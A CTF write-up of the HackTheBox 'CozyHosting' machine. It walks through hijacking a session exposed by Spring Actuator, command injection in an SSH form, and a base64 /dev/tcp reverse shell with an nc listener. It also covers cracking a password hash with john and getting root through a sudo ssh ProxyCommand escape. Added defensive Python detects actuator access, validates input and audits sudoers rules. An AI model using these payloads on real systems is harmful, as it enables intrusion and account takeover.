HTB: CozyHosting


Introduction
#

CozyHosting is an easy Linux box on HackTheBox based around session-cookie abuse, command injection, and heavy use of Burp Suite.

Recon
#

nmap
#

nmap -sV -sC -Pn -p- --min-rate=1000 10.129.110.116
(screenshot: nmap output)

We found two open ports, the usual combo of SSH on port 22 and a web server on port 80. We can't access the website quite yet (it throws an error at us), so let's add the IP to /etc/hosts and try to access it again.

(screenshot: /etc/hosts entry)

Site Exploration
#

(screenshot: website landing page)

There is nothing interesting on this page apart from the login button, so let's fuzz for the directories enabled on this site.

dirsearch -u http://cozyhosting.htb/
(screenshot: dirsearch results)

We found a few interesting things: /admin unfortunately redirects back to the login page, but there are more interesting options under /actuator.

In /actuator/sessions we can see the session cookies of previous logins, one of them together with its username.

(screenshot: /actuator/sessions output)
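The /actuator paths are Spring Boot Actuator endpoints, and /actuator/sessions handing out live session IDs is the root cause of the foothold. From the defending side the fix is twofold: do not expose those endpoints on the public listener (Spring's management.endpoints.web.exposure.include should list only what is needed, and sessions, env and heapdump should never be reachable from outside), and alert when someone reaches them anyway. As an added example that is not part of this writeup, the Python below parses combined-format access-log lines (constructed samples, not logs from the box) and flags successful, non-loopback requests to /actuator; the set of "sensitive" paths is my own assumption.

```python
# Added example (not from the original writeup): flag successful, non-local
# requests to Spring Boot Actuator endpoints in combined-format access logs.
# The log lines below are constructed samples, not logs from the box.
import re
from ipaddress import ip_address

# Actuator endpoints that expose secrets or live state; /actuator/sessions is
# the one the writeup abuses. The list is an assumption for this example.
SENSITIVE_ACTUATOR_PATHS = {
    "/actuator/sessions",
    "/actuator/env",
    "/actuator/heapdump",
    "/actuator/mappings",
    "/actuator/beans",
}

# client, identd, user, [timestamp], "METHOD path protocol", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    # Drop the query string and trailing slash so /actuator/ and /actuator compare equal.
    entry["path"] = entry["path"].split("?", 1)[0].rstrip("/") or "/"
    entry["status"] = int(entry["status"])
    return entry


def is_actuator_hit(entry):
    """True when a non-loopback client got a successful (<400) response from /actuator."""
    if entry is None:
        return False
    path = entry["path"]
    if path != "/actuator" and not path.startswith("/actuator/"):
        return False
    if entry["status"] >= 400:
        return False  # denied or missing: nothing was exposed
    try:
        if ip_address(entry["ip"]).is_loopback:
            return False  # local health checks are expected
    except ValueError:
        pass  # a hostname instead of an IP: keep it, over-alerting is fine here
    return True


def find_actuator_hits(lines):
    """Return the entries that should raise an alert, marking the high-value paths."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if is_actuator_hit(entry):
            entry["sensitive"] = entry["path"] in SENSITIVE_ACTUATOR_PATHS
            hits.append(entry)
    return hits


# Constructed sample log lines (client IPs and timestamps are made up).
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Sep/2023:10:00:01 +0000] "GET /login HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Sep/2023:10:00:07 +0000] "GET /actuator HTTP/1.1" 200 634 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Sep/2023:10:00:09 +0000] "GET /actuator/sessions HTTP/1.1" 200 212 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Sep/2023:10:00:15 +0000] "GET /admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Sep/2023:10:00:30 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "curl/7.88"',
    '10.10.14.9 - - [01/Sep/2023:10:01:02 +0000] "GET /actuator/env HTTP/1.1" 403 0 "-" "python-requests/2.31"',
    'not a log line at all',
]

if __name__ == "__main__":
    for hit in find_actuator_hits(SAMPLE_LOG):
        flag = "SENSITIVE" if hit["sensitive"] else "info"
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['path']} -> {flag}")
```

Only the two requests from 10.10.14.5 that actually got a 200 from /actuator are reported; the loopback health check and the 403 on /actuator/env are ignored, which keeps the rule quiet on a correctly locked-down deployment.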

Log in
#

Using Burp we can capture our login attempt and switch the JSESSIONID for the one we found earlier.

Be careful: the session ID is on a timer, so you may need to refresh it before use.
(screenshot: actuator)

With that we are in!

(screenshot: logged-in site)

At the bottom of the page there is a form that serves as an SSH connection. Using Burp we can intercept the request again and change the values to anything we want.

(screenshot: intercepted SSH form request)
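The SSH form is a textbook OS command injection: user-supplied values are dropped into a shell command line, so shell metacharacters run whatever follows them. The defensive fix is to validate the values against an allowlist and to hand the program an argument list rather than a shell string. The Python below is an added example, not the box's application code: the field names (username, host) and the exact ssh command are assumptions, and the injectable builder is shown only for contrast and is never executed.

```python
# Added example, not the box's application code. The form is assumed to take a
# 'username' and a 'host' and to build an ssh command from them; the real
# application's fields and command shape are not shown in the writeup.
import re

# Characters a shell treats specially; any of them in an interpolated string
# means the command the developer wrote is no longer the only command that runs.
SHELL_METACHARACTERS = set(";|&$`<>()\n\"'\\")

# Allowlists: POSIX-style usernames and plain hostnames/IPs only. Nothing else
# is ever accepted, so there is no blocklist to bypass.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def build_ssh_command_unsafe(username, host):
    """The injectable pattern: form values interpolated into one string that is
    handed to a shell. Shown for contrast only; never execute the result."""
    return f"ssh -o ConnectTimeout=5 {username}@{host}"


def contains_shell_metacharacter(command_string):
    """True if a shell would see more than the intended ssh invocation."""
    return any(ch in SHELL_METACHARACTERS for ch in command_string)


def check_form_input(username, host):
    """Return a list of validation errors (an empty list means the input is acceptable)."""
    errors = []
    if not USERNAME_RE.match(username):
        errors.append("username must match " + USERNAME_RE.pattern)
    if not HOSTNAME_RE.match(host):
        errors.append("host must be a plain hostname or IP address")
    return errors


def build_ssh_command_safe(username, host):
    """Validate first, then return an argv list for subprocess.run(argv) with the
    default shell=False: no shell parses it, so metacharacters are inert. The
    hostname allowlist also forbids a leading '-', so the value can never be
    read as an ssh option if it is ever passed as its own argument."""
    errors = check_form_input(username, host)
    if errors:
        raise ValueError("; ".join(errors))
    return ["ssh", "-o", "ConnectTimeout=5", f"{username}@{host}"]


if __name__ == "__main__":
    # Constructed inputs: an honest one and one carrying a second command.
    for user, host in (("alice", "localhost"), ("alice;id", "localhost")):
        unsafe = build_ssh_command_unsafe(user, host)
        print(f"unsafe string: {unsafe!r} -> injectable: {contains_shell_metacharacter(unsafe)}")
        try:
            print(f"safe argv:     {build_ssh_command_safe(user, host)}")
        except ValueError as e:
            print(f"safe argv:     rejected ({e})")
```

The important design choice is that the safe version does not try to strip or escape bad characters: it rejects anything outside the allowlist and never lets a shell see the values at all, so there is nothing for URL-encoding tricks or quoting games to bypass.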

Reverse Shell
#

There are many ways to get a reverse shell now.

Try THIS useful website.

echo "bash -i >& /dev/tcp/{YOUR_IP}/{YOUR_PORT} 0>&1" | base64 -w 0
echo "{PAYLOAD}"|base64 -d|bash
(screenshot: payload)

Just don't forget to URL-encode whatever you choose (Ctrl+U in Burp).

Start an nc listener

nc -lvnp 4444

and send the request.

(screenshot: request)

Now make the shell stable.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
(press Ctrl+Z to background the shell)
stty raw -echo; fg

Exploration
#

There is a .jar file we can use. Run a Python web server on the box

python3 -m http.server 4444

and download it to your machine.

wget http://10.129.110.116:4444/cloudhosting-0.0.1.jar

Now open it with jd-gui and see what we've got.

(screenshots: jd-gui decompiled source)

With the password we found inside we can log into the database.

psql -h 127.0.0.1 -U postgres
(screenshot: database session)

When we select all users we can see the hashed password of the admin account.

John
#

Now we can use john to crack the password.

john password_hash.txt --wordlist=rockyou.txt
(screenshot: john output)

With the newly found password and the username we got from /etc/passwd

(screenshot: /etc/passwd)

we can use the SSH port we found at the beginning.

SSH in
#

(screenshot: ssh login)

… and grab the flag!

Privilege Escalation
#

We can use sudo -l to list the commands our user is allowed to run.

Here we find that our user may run /usr/bin/ssh * as root on localhost, which will give us root privileges.

(screenshot: sudo -l output)
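A rule of the form (root) /usr/bin/ssh * lets the caller pick ssh's options, which is exactly what the GTFOBins ssh entry relies on; a sudoers rule should name the full, fixed command line, and a wildcard on a binary with a known shell escape is a root shell waiting to happen. As an added example that is not from the writeup, the Python below parses sudoers-style user specifications (a constructed excerpt, not the box's file) and flags commands granted with a wildcard, granted as ALL, or naming a binary from a small hand-picked subset of the GTFOBins sudo list; that subset is my assumption for this check.

```python
# Added example, not from the writeup: audit sudoers-style rules for the pattern
# the box turns into a root shell (a command with a wildcard argument, or a
# binary with a known shell escape). The rules below are constructed samples.
import re
from posixpath import basename

# user host=(runas) [TAG:] command[, command...]
SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# A small, hand-picked subset of binaries listed on GTFOBins under 'sudo'
# (an assumption of this example; ssh is the one the box uses).
SHELL_ESCAPE_BINARIES = {"ssh", "vim", "less", "find", "awk", "perl", "python3"}


def parse_sudoers_rule(line):
    """Parse one user-specification line; return None for comments, blanks and Defaults."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = SUDOERS_RE.match(line)
    if m is None:
        return None
    return {
        "user": m["user"],
        "runas": (m["runas"] or "root").strip(),  # sudo runs as root when no (runas) is given
        "nopasswd": "NOPASSWD:" in m["tags"],
        "commands": [c.strip() for c in m["cmds"].split(",") if c.strip()],
    }


def classify_command(cmd):
    """Return the reasons a granted command is dangerous (empty list if none found)."""
    if cmd == "ALL":
        return ["ALL"]
    reasons = []
    if "*" in cmd:
        reasons.append("wildcard")  # the caller controls the arguments
    if basename(cmd.split()[0]) in SHELL_ESCAPE_BINARIES:
        reasons.append("shell-escape")
    return reasons


def audit_sudoers(lines):
    """Flatten the rules and keep every (user, command) pair with at least one reason."""
    findings = []
    for line in lines:
        rule = parse_sudoers_rule(line)
        if rule is None:
            continue
        for cmd in rule["commands"]:
            reasons = classify_command(cmd)
            if reasons:
                findings.append({
                    "user": rule["user"],
                    "runas": rule["runas"],
                    "nopasswd": rule["nopasswd"],
                    "command": cmd,
                    "reasons": reasons,
                })
    return findings


# Constructed sample; 'someuser' stands in for the box's low-privileged account.
SAMPLE_SUDOERS = [
    "# constructed sudoers excerpt, not the box's real file",
    "Defaults env_reset",
    "someuser ALL=(root) NOPASSWD: /usr/bin/ssh *",
    "deploy ALL=(root) /usr/bin/systemctl restart nginx",
    "%backup ALL=(ALL) NOPASSWD: /usr/bin/rsync, /usr/bin/find /var/backups",
]

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['user']}: {tag}({f['runas']}) {f['command']} -> {', '.join(f['reasons'])}")
```

The systemctl rule passes because it names a complete command line with no wildcard and no shell-escape binary; the ssh rule is flagged on both counts, and the find rule shows that a shell escape is a finding even without a wildcard.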

Just check out GTFOBins for the command.

ssh -o ProxyCommand=';sh 0<&2 1>&2' x
(screenshot: root shell)

and it is done!

Now grab the flag and have a nice day!
